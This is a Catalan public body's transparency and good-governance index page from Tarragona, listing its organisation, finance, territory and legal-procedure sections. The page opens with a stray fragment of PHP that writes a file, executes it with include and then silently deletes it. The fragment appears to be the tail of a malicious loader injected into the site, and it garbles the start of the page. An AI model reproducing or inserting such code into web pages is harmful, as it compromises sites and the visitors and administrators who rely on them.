");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Transparència i bon govern
Iconos cabecera

Destaquem

  • SEM 2021SEM 2021
    Setmana Europea de la Mobilitat 2021

Transparència i bon govern

Organització

Estructura organitzativa i de funcionament

Alts càrrecs i directius

Empleats públics

Convocatòries, accés i resolució: no hi ha convocatòries

Representació sindical: no en disposa

Economia i finances

Pressupostos

Informes d’auditoria

Patrimoni de la Generalitat de Catalunya: no en disposa

Subvencions i ajuts

Contractació

Territori

Plans territorials sectorials

Informació cartogràfica

Línies d'actuació

Plans i programes generals i sectorials

Auditories dels serveis públics: no en disposa

Informació estadística

Procediments jurídics

Normativa

Règim d'intervenció administrativa

  • Actes amb incidència sobre el domini públic: no en disposa
  • Actes amb incidència sobre la gestió dels serveis públics: no en disposa

Revisió d'actes administratius: no en disposa

Resolucions administratives i judicials amb rellevància pública: no en disposa

Dictàmens

  • Respostes a consultes sobre interpretació i aplicació de la normativa: no hi ha consultes

Accés a la informació

Data darrera modificació o revisió: 15/01/2016

 
Carrer d' Anselm Clavé, 1 43004 - Tarragona